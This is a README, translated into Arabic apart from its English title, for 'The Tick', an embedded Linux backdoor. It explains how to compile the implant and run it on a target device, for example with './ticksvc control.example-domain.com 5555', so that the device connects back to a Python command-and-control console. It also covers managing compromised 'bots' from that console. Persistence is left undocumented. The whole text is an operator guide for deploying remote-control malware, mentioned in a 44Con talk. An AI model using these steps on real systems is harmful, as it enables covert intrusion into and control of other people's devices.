
A simple embedded Linux backdoor.
باب خلفي بسيط للينكس المضمّن.

يعتمد The Tick على libcurl فقط، لذا تأكد من توفر حزمة التطوير المناسبة. على سبيل المثال، في التوزيعات المبنية على دبيان ستقوم بما يلي:
sudo apt-get install libcurl-dev
بمجرد تثبيت التبعيات، قم بتشغيل ملف makefile:
cd src
make clean
make
بمجرد اكتمال تشغيل الأمر "make"، ستجد الملف الثنائي المُجمَّع في مجلد "bin". هذا هو الملف الثنائي الذي تريد تشغيله على جهازك الهدف للتحكم فيه عن بُعد.
عند إجراء الترجمة المتقاطعة (cross-compiling) للأنظمة الأساسية المدعومة، يتم حل التبعيات وتجميعها تلقائيًا نيابةً عنك. حاليًا، النظام الأساسي الوحيد المدعوم للترجمة المتقاطعة هو طابعة Lexmark CX310DN، ولكن ستُضاف أجهزة أخرى لاحقًا. راجع ملف makefile لمزيد من التفاصيل.
واجهة القيادة والتحكم مكتوبة بلغة Python، وبالتالي لا تحتاج إلى تجميع.
الحصول على الثبات (persistence) على الباب الخلفي يعتمد بشكل كبير على النظام الأساسي الهدف، ولذلك لا يُوثَّق هنا.
على الجهاز الهدف، قم بتشغيل الملف الثنائي للباب الخلفي بالوسائط التالية:
./ticksvc ADDR PORT
حيث يجب استبدال "ADDR" و"PORT" بعنوان IP والمنفذ حيث ستستمع واجهة القيادة والتحكم. المنفذ الافتراضي هو 5555.
لا تتطلب واجهة القيادة والتحكم أي تثبيت، ولكن قد يكون لديها تبعيات غير محلولة. نفّذ الأمر التالي للتأكد من تثبيت جميع التبعيات بشكل صحيح (لاحظ أن هذا لا يتطلب صلاحيات sudo):
pip install --upgrade -r requirements.txt
في معظم بيئات سطح مكتب لينكس، سيقوم ملف "Tick.desktop" التالي بإنشاء أيقونة يمكنك النقر عليها مرتين لتشغيل الواجهة:
[Desktop Entry]
Encoding=UTF-8
Value=1.0
Type=Application
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor
Icon=/opt/thetick/doc/logo.png
Exec=/opt/thetick/tick.py
Terminal=true
Path=/opt/thetick/
قد يختلف الموقع الدقيق لملف Tick.desktop بين توزيعات لينكس، ولكن بشكل عام وضعه على سطح المكتب يجب أن يعمل. تأكد من تعديل المسار إلى المكان الذي حمّلت فيه The Tick (/opt/thetick في المثال أعلاه).
لتشغيل الملف الثنائي للباب الخلفي على النظام الأساسي الهدف، اضبط اسم مضيف خادم التحكم والمنفذ كخيارات لسطر الأوامر. على سبيل المثال:
./ticksvc control.example-domain.com 5555
على خادم التحكم، قد ترغب في تشغيل الواجهة داخل جلسة GNU screen أو ما شابه ذلك:
sudo apt-get install screen
screen -S thetick ./thetick.py
بهذه الطريقة يمكنك الانفصال عن الواجهة بالضغط على Control+A ثم D. ويمكنك العودة إلى الواجهة لاحقًا هكذا:
screen -r thetick
ستُعلمك الواجهة عند اتصال بوت جديد بها. استخدم الأمر "bots" لعرض البوتات المتصلة حاليًا، وسيحدد الأمر "use" بوتًا للعمل معه. ويعرض الأمر "help" دليل المستخدم.
فيما يلي بعض لقطات الشاشة التي توضح ما يمكن أن تفعله الواجهة:


تمت الإشارة إلى The Tick في العرض التالي من مؤتمر 44Con من تقديم Daniel Romero وMario Rivas: